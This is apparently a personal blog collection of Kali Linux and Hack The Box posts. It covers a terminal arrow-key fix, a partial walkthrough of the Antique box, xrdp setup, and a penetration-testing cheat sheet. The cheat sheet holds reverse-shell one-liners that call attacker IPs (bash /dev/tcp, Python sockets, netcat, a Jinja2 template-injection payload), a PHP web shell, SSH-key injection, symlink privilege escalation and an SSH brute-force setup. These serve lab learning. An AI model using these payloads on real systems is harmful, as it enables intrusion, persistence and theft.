Kali Linux – Arrow keys not working

Twice now, I have loaded my VM for a day of digging around HTB and found that none of my arrow keys work in my terminal. The enter key sometimes works, the number keypad is dead; generally it's a mess.

After a good amount of digging, this seems to fix it. Once you run the command, kill the session and start a new one.

sudo chsh -s /bin/bash

One thing to watch: chsh with no username changes the login shell of the user running it, so under sudo that is root, not you. If you log in as a normal user, run it without sudo, or pass your username as the last argument.

I picked this up from askubuntu:

https://askubuntu.com/questions/325807/arrow-keys-home-end-tab-complete-keys-not-working-in-shell

Well, that probably explains it: I had been playing around far too much with /bin/sh.
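To see whether the login shell really is the culprit before changing anything, here is an added check script (not from the original post). It reads the shell field from the user's passwd record, flags sh/dash (on Debian-based Kali /bin/sh is dash, which has no readline line editing, so arrow keys do nothing), and prints a chsh command with the username filled in so the fix lands on the right account rather than on root.

```shell
#!/bin/sh
# Added example (not from the original post): decide whether the login
# shell recorded in /etc/passwd is why arrow keys are dead, and print the
# chsh command that fixes it for the *right* user.

# Extract the login-shell field (7th) from a passwd-format record.
login_shell_of_record() {
    printf '%s\n' "$1" | cut -d: -f7
}

# Return 0 if the shell binary has no interactive line editing.
# /bin/sh on Kali/Debian is dash, which lacks readline; bash and zsh have it.
lacks_line_editing() {
    case "$(basename "$1")" in
        sh|dash) return 0 ;;
        *)       return 1 ;;
    esac
}

# Build the fix. chsh with no username changes the *invoking* user's
# shell; under sudo that is root, so the username is always passed.
fix_command_for() {
    printf 'chsh -s /bin/bash %s\n' "$1"
}

# Look up a user and report; returns 1 when a fix is needed.
diagnose_user() {
    user="$1"
    record=$(getent passwd "$user") || { echo "no passwd entry for $user" >&2; return 2; }
    shell=$(login_shell_of_record "$record")
    if lacks_line_editing "$shell"; then
        echo "$user logs in with $shell (no line editing); run: $(fix_command_for "$user")"
        return 1
    fi
    echo "$user logs in with $shell; arrow keys should work in a fresh session"
    return 0
}

# Usage: check the current user (the exit status is kept in rc).
rc=0
diagnose_user "${USER:-$(id -un)}" || rc=$?
```

Note that `bash` started from a dash login shell still has working arrow keys; it is the shell that owns the terminal session (the one in /etc/passwd, or the one xterm/tmux spawns) that matters.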

Hack the Box – Antique – Walkthrough

So this is one of the easy-rated boxes from HTB. Let's dive in and add the IP to the /etc/hosts file:

sudo nano /etc/hosts

Now a good nmap scan for a start:

nmap -sC -sV -sT -p- -v antique.htb

and while that runs, let's do a UDP scan in the background for good measure (UDP scanning needs raw sockets, hence the sudo):

sudo nmap -sC -sV -sT -sU -v antique.htb

This will take a looooooong time, so we’ll come back to it later.

The nmap shows us some interesting things: the name “HP JetDirect” comes up a lot, and the telnet port is also pretty interesting.

That would mean we have a printer, but there's no IPP port open.

Let's check searchsploit for JetDirect:

A few good finds, but I like the look of SNMP password disclosure; SNMP is usually pretty open. Let's search on exploit-db.

Okay, let's have a play.

First, let's do a walk while nmap is still being slow.

snmpwalk -v 2c -c public antique.htb

Well, that was disappointing, but it is listening.

Can we run the exploit?

Ergh, that would be a no.

I did try to find out how to install snmputil, but it didn't show on apt, and nor did net-snmp or net-snmp-util. (On Kali and Debian the snmpwalk/snmpget tools come from the snmp package, and the MIB files from snmp-mibs-downloader.)

Maybe we can help the snmpwalk command along a bit...

Okay, that's better.

I think that's hex encoded; let's take a look:

Nice-looking password we seem to have sitting there; only one place I can think of for that.
I like this game 🙂
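The hex-decoding step above, as an added example that is not part of the original walkthrough: snmpwalk prints binary values as "Hex-STRING: 50 40 73 ..." and a device-stored password frequently comes back padded with control bytes, so the decoder below keeps only printable ASCII. The sample line is constructed (the OID and bytes are made up for the example, not taken from the box), and the code relies only on POSIX sh, printf octal escapes and sed, so it runs under dash as well as bash.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): turn an snmpwalk
# "Hex-STRING:" line back into text, keeping printable bytes only.

# Print one byte from its decimal value using a POSIX octal escape, so the
# function works in dash (which lacks printf %b \x support) as well as bash.
print_byte() {
    printf "\\$(printf '%03o' "$1")"
}

# Decode the hex pairs after "Hex-STRING:" into printable ASCII.
# Bytes outside 0x20..0x7e (padding, control characters) are dropped.
decode_hex_string() {
    hex=$(printf '%s\n' "$1" | sed -n 's/.*Hex-STRING: *//p')
    for h in $hex; do
        n=$((0x$h))
        if [ "$n" -ge 32 ] && [ "$n" -le 126 ]; then
            print_byte "$n"
        fi
    done
    printf '\n'
}

# Constructed sample in the shape snmpwalk prints; OID and bytes are made up.
SAMPLE='iso.3.6.1.4.1.99999.1.0 = Hex-STRING: 50 40 73 73 77 30 72 64 01 00 '

# Usage: decode_hex_string "$SAMPLE"   (prints the printable part of the value)
```

snmpwalk wraps long Hex-STRING values across several lines; join them first (for example `snmpwalk ... | tr -d '\n'`) before handing the text to decode_hex_string, otherwise only the first line is decoded.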

Although this is not the nicest of shells...

Actually, hang on, let's read that again: we can use the “exec” command to send system commands.

So what does id give us?

exec id

Okay, that's better. Any cheeky flag for us?

Yes that is a cheeky flag!

So we can use the cat command and id; can we use python?

I think that is a kind of?

python3?


So this hung on me, but we must have something.

Let's try some more examples.

Kali – Quick Deploy “SuperCharger” Script

This page contains a script to fix a number of issues in the current version of Kali and to deploy some additional tools into a new instance in an automated fashion. Run it as root (or with sudo).

#!/bin/sh
# Run as root (or under sudo)
apt-get update
apt-get upgrade -y

# Fix a broken dependency in theHarvester
pip3 install aiohttp --upgrade

# Get the pspy process-snooping binaries (32- and 64-bit), pinned to the v1.2.0 release
mkdir -p ~/pspy && cd ~/pspy
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy32 pspy64


Kali – How to setup RDP into a Kali Linux Box

I am a big fan of VMs, but not such a fan of the tools used to connect to them in most instances.

Hyper-V, the vSphere remote console, VMware Player: they all feel clunky, have inconsistent features and lack some of the basics I really enjoy from modern RDP.

Kali does not have this out of the box, so let's see if we can enable it.

Take a fresh Kali install and open a terminal:

sudo apt-get update
sudo apt-get install -y xrdp
sudo systemctl start xrdp
sudo systemctl start xrdp-sesman

sudo systemctl enable xrdp
sudo systemctl enable xrdp-sesman

Now there are a few configuration changes we need to make.

Only one X session is allowed by default, which means you will get a black screen after connecting if you are also logged in on the machine locally.

It can also be a problem if your session gets disconnected, as there are times when reconnecting to the existing session will fail.

Let's make an edit to the /etc/xrdp/startwm.sh file.

Add these lines before the “test -x /etc/X11/Xsession && exec /etc/X11/Xsession” line:

unset DBUS_SESSION_BUS_ADDRESS
unset XDG_RUNTIME_DIR
. $HOME/.profile

At this point, I like to reboot the machine to emulate a fresh session and see what we get:

Beautiful!

Now we have a full RDP session, with copy and paste and a 4K resolution!

One caveat: xrdp listens on TCP 3389 on every interface, so keep the VM on a host-only or NAT network, or firewall the port, rather than exposing an RDP login to whatever network the VM is bridged onto.
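The whole procedure above as one idempotent script is an added example, not code from the original post. It installs and enables xrdp, then inserts the three session-fix lines into /etc/xrdp/startwm.sh immediately before the line that execs /etc/X11/Xsession, skipping the edit if it has already been applied and writing the file in place so its permissions survive. STARTWM can be pointed at a copy to try the patch function first; `install` as the only argument runs the full setup and is assumed to be executed as root.

```shell
#!/bin/sh
# Added example (not from the original post): xrdp setup as an idempotent
# script. Run with:  sudo sh setup-xrdp.sh install

STARTWM="${STARTWM:-/etc/xrdp/startwm.sh}"

# Lines xrdp's session needs so a second X session does not come up black.
FIX_LINES='unset DBUS_SESSION_BUS_ADDRESS
unset XDG_RUNTIME_DIR
. $HOME/.profile'

# Insert FIX_LINES before the first "test -x /etc/X11/Xsession" line in $1.
# Returns 0 if the file was changed, 1 if it was already patched.
patch_startwm() {
    file="$1"
    if grep -q '^unset DBUS_SESSION_BUS_ADDRESS' "$file"; then
        return 1
    fi
    tmp="$file.tmp.$$"
    awk -v fix="$FIX_LINES" '
        !done && /^test -x \/etc\/X11\/Xsession/ { print fix; done = 1 }
        { print }
    ' "$file" > "$tmp" || return 2
    # Overwrite in place (not mv) so the file keeps its mode bits.
    cat "$tmp" > "$file" && rm -f "$tmp"
}

install_xrdp() {
    apt-get update
    apt-get install -y xrdp
    systemctl enable --now xrdp xrdp-sesman
}

main() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root: sudo sh $0 install" >&2; exit 1; }
    install_xrdp
    if patch_startwm "$STARTWM"; then
        echo "patched $STARTWM; reboot (or restart xrdp) to pick it up"
    else
        echo "$STARTWM already patched"
    fi
}

case "${1:-}" in
    install) main ;;
esac
```

After running it, `ss -ltnp | grep 3389` confirms xrdp is listening; remember the caveat above about which interfaces that socket is reachable from.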

Penetration Testing Tool Quick Guide

updated 22/01/2022

Scanning Tools:

Rustscan

Find open ports; similar to nmap but quicker, and it can hand the open ports to nmap for service detection.

Easiest to install via its Docker image (a .deb is also published on the GitHub releases page).

rustscan -a **Hostname** -u 2500

(-u raises the open-file limit for the scan; lower it if the target or your VPN link drops packets.)

Nmap

Find open ports and services

Scan for Services:

nmap **hostname** -v -sV

Run default scripts on found services:

nmap **hostname** -v -sV -sC

Strings

Find all strings in a file

strings **filename**

Binwalk

Find and extract (-e) all files embedded in a file

binwalk -e **filename**

Enumeration Tools:

Amass subdomain scanner

amass enum -d **domain** -d **anotherdomain**

lse.sh (Linux Smart Enumeration: local privilege-escalation checks)

https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

Enum4Linux

Enumerates SMB/Samba hosts (Windows and Linux): users, shares, groups and password policy

enum4linux -a 10.10.11.108

FFUF

#subdomain
ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200


#files
ffuf -u http://pets.devzat.htb/FUZZ -w ~/tools/SecLists/Discovery/Web-Content/raft-small-words.txt -fs 510

PSPY

Process monitoring without root (watches for cron jobs and other users' commands)

https://github.com/DominicBreuker/pspy

GoBuster

Enumerates websites based on a wordlist.

Directories:
gobuster dir -u **hostname** -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard

Subdomains:
gobuster vhost -u **hostname**  -w /home/dev/subdomains-top1million-110000.txt -r 

PHP Files:

gobuster dir -u **hostname** -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

DirSearch

Web enumeration

python3 dirsearch.py -u 10.10.11.104  

WFuzz

Subdomain:
wfuzz -w **wordlist** -u http://**HOST**/ --hc 301 -v -c -H "Host:FUZZ.**hostname**"


Pages:
wfuzz -w **wordlist** -u http://**SUBDOMAIN.HOST**/FUZZ -v -c --hc 404,403 --hw 33

Parameters:
wfuzz -u http://10.10.11.135/image.php?FUZZ=/etc/passwd -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt -t 50 --hh 0

Whatweb

Fingerprints a website's technology stack, such as “WordPress”

whatweb **hostname**

Searchsploit

Searches for exploits in a given platform

searchsploit **platform** **version**

e.g:

searchsploit wordpress 5.8.2

Find files owned by a user with mode 600 (owner read/write only)

find / -type f -user **user** -perm 600 2>/dev/null

WordPress Scan

Scans wordpress sites

wpscan --url http://**HOSTNAME**/ --api-token **TOKEN** --enumerate p,u --plugins-detection aggressive

Find SETUID files

find / -perm -u=s -type f 2>/dev/null

Command Injection Examples

PHP (minimal web shell; call it as page.php?cmd=id)

<?php system($_GET['cmd']); ?>

Pivoting and Tunnelling Tools:

Chisel

Tunnels TCP traffic over HTTP between a server on your attacking machine and a client on the target, so a port that is only reachable from the target (for example, a service bound to 127.0.0.1) can be reached from your own machine. The build step needs a Go toolchain; copy the resulting static binary to the target.

Server (on the attacking machine; --reverse lets the client open reverse port forwards):

git clone https://github.com/jpillora/chisel
cd chisel && CGO_ENABLED=0 go build -ldflags="-s -w"
sudo ./chisel server -p 8000 --reverse

Client (on the target; exposes the target's 127.0.0.1:**porttoforward** as port **porttoforward** on the server):

./chisel client **SERVERIP**:8000 R:**porttoforward**:127.0.0.1:**porttoforward**

Port Forward traffic using SSH

Local forward: connections to 127.0.0.1:**portToForward** on your machine are sent to the same port on the remote host's loopback.

ssh -i **privateKey** -L **portToForward**:127.0.0.1:**portToForward** **user@host**

Netcat

Open a specified port and listen (sudo is only needed for ports below 1024):

nc -lvnp **port**

Make a connection:

nc **host** **port**

Git Extractor (rebuilds commits from a downloaded .git directory)

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh

Git Dumper (downloads an exposed .git directory from a web server)

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh

./gitdumper.sh http://pets.devzat.htb/.git/ HTBdevzat

Identify Hashed strings

https://hashes.com/en/tools/hash_identifier

Privilege Escalation

Extract user ssh key

#on the target: read the key (do not echo $(cat …), which collapses the key onto one line and ssh will then reject it)
cat /home/**user**/.ssh/id_rsa

#place it in a file on the client, restrict its permissions (ssh refuses a key file readable by others) and connect
chmod 600 *keyfile*
ssh -i *keyfile* user@hostname.fqdn

Useful File Locations:

Linux

/etc/passwd
/etc/shadow
/var/log/mysql/error.log

Resources:

Exploit DB

https://www.exploit-db.com/

Reverse Shell Guide

https://sentrywhale.com/documentation/reverse-shell

Sub Domain List

https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-110000.txt

Vulners

http://vulners.com

Exploit Tools

Evil-WinRM

Access Win-rm using linux

evil-winrm -i **hostname** -u **user** -p **password**

crackmap

Post-exploitation tool, run from Linux, for testing credentials and running commands across SMB, WinRM and other protocols on Windows/AD hosts.

SMB – check credentials:

crackmapexec smb **hostname** -u **user** -p **password**

winrm – check credentials:

crackmapexec winrm **hostname** -u **user** -p **password**

MetaSploit

init the framework:

 sudo msfdb init

start DB:

sudo msfdb start

connect to console:

msfconsole -q

search for exploit:

search **platformname**

get current user (inside a meterpreter session):

getuid

execute a command on the target (meterpreter; -c channelises the output and -i interacts with it):

execute -f cmd.exe -c -i

spawn a listener:

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost <mymachine>
set lport <myport>
run

Shell one Liners:

Server-side Template Injection (Jinja2/Flask; spawns a reverse shell to *IP* *PORT*)

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *IP* *PORT* >/tmp/f')|attr('read')()}}

Python3

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",12234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

(Prefix it with exec only when sending it through something like the HP JetDirect telnet console, which needs that keyword to run a system command.)

Bash

bash -c 'bash -i >& /dev/tcp/**IP**/**port** 0>&1'

mkfifo /tmp/lol;nc **IP** **PORT** 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Encode to base 64

#encode
 echo -n 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1' | base64

#on the target (e.g. injected into a web parameter)
echo -n ***encodedstring*** | base64 -d | bash

URL encoded Bash

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.8/9001+0>%261'

NC

nc **clientip** **port** -e /bin/bash

(-e exists in nc.traditional and ncat; the OpenBSD netcat shipped by default lacks it, hence the mkfifo variant above.)

Web

%26/bin/bash+-c+'bash+-i+>%26+/dev/tcp/**IP**/**Port**+0>%261'

(URL-encoded; the leading %26 is an & that chains the shell onto whatever command the injectable parameter already runs.)

Stabilizing a shell

Python (substitute python3 where python is not installed)

python -c 'import pty;pty.spawn("/bin/bash")'

Inject SSH-key to target machine:

On Client:
ssh-keygen -t rsa -b 4096 -C '**user@domain**' -f **outputfile** -P ''
export PUBLIC_KEY=$(cat **outputfile**.pub)

Code Injection (the command string sent to the target; $PUBLIC_KEY expands on your machine when the payload is built):
mkdir -p /home/**targetuser**/.ssh; echo "$PUBLIC_KEY" >> /home/**targetuser**/.ssh/authorized_keys
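The key drop above leaves .ssh and authorized_keys with whatever mode the target's umask gives, and sshd with the default StrictModes yes silently ignores a key file that is group- or world-writable, so the login fails with no hint why. As an added example (not from the original cheat sheet) the function below installs a key with the right permissions and refuses to append a key that is already present; a second function squeezes the same steps into the single-line form a command-injection point needs. The sample key is constructed and is not a real key; the home directory path is whatever you pass in.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): drop a public key into
# a user's authorized_keys the way sshd's StrictModes wants it.

# install_pubkey HOMEDIR PUBKEY_LINE
# Returns 0 if the key was added, 1 if it was already present.
install_pubkey() {
    home="$1"
    key="$2"
    sshdir="$home/.ssh"
    auth="$sshdir/authorized_keys"

    mkdir -p "$sshdir"
    chmod 700 "$sshdir"        # sshd rejects a .ssh writable by others
    touch "$auth"
    chmod 600 "$auth"          # likewise for authorized_keys

    # -F -x: fixed string, whole line, so a key with a different comment
    # is still treated as a different entry.
    if grep -qFx -- "$key" "$auth"; then
        return 1
    fi
    printf '%s\n' "$key" >> "$auth"
}

# Same steps on one line, for use as an injected command string. The key
# is single-quoted: the type and base64 blob never contain a quote.
injection_payload() {
    printf "mkdir -p %s/.ssh && chmod 700 %s/.ssh && echo '%s' >> %s/.ssh/authorized_keys && chmod 600 %s/.ssh/authorized_keys\n" \
        "$1" "$1" "$2" "$1" "$1"
}

# Constructed sample key (not a real key), in the 'type blob comment' shape.
SAMPLE_KEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleExampleExampleExampleExampleExample kali@attacker'

# Usage:
#   install_pubkey /home/dev "$SAMPLE_KEY"
#   injection_payload /home/dev "$SAMPLE_KEY"   # string to feed to the injection point
```

If the home directory itself is group- or world-writable sshd will still refuse the key under StrictModes; that is a property of the target you cannot fix from authorized_keys alone.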

CURL encode payload data

curl -i -H "**headers**" '**url**' -G --data-urlencode "**injectionPoint**;**injected commands**"

Privilege Escalation

Install ssh key via symlink (when a root-owned process will write a file to a path you control)

#*fileToWriteTo* is the file the privileged process writes your key into (on the box in question it had to be named id_rsa.pub or keys); pointing it at root's authorized_keys makes that write install your key
ln -s /root/.ssh/authorized_keys *fileToWriteTo*

Spawn a python webserver in the current folder (port 80 needs root; any port above 1023 works without it)

python3 -m http.server 80

SSH Brute Force

msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts *target*
set username root
set pass_file *wordlist*
set verbose true
set stop_on_success true
run

PowerShell Cheat Sheet

This PowerShell cheat sheet lists a number of commands that I often find useful.

Let's get started with some of the simpler ones:

Class Definition in PowerShell:

class MyClass {
    # Constructor: runs when [MyClass]::new() is called
    MyClass() {
    }
}

Return from a function in PowerShell:

class MyClass {
    # Method whose return type is declared as [string]
    [string] ExampleFunction() {
        $string = "example"
        return $string
    }
}

Get All Files in a Directory:

Get-ChildItem -Path $path

This returns every file and folder directly under $path (the current directory if -Path is omitted); add -File to restrict it to files and -Recurse to descend into subfolders.

Loop over files in a directory:

Get-ChildItem -Path $path | ForEach-Object { ** do something with $_ ** }

This will ** do something ** to each item in the directory, with $_ holding the current item.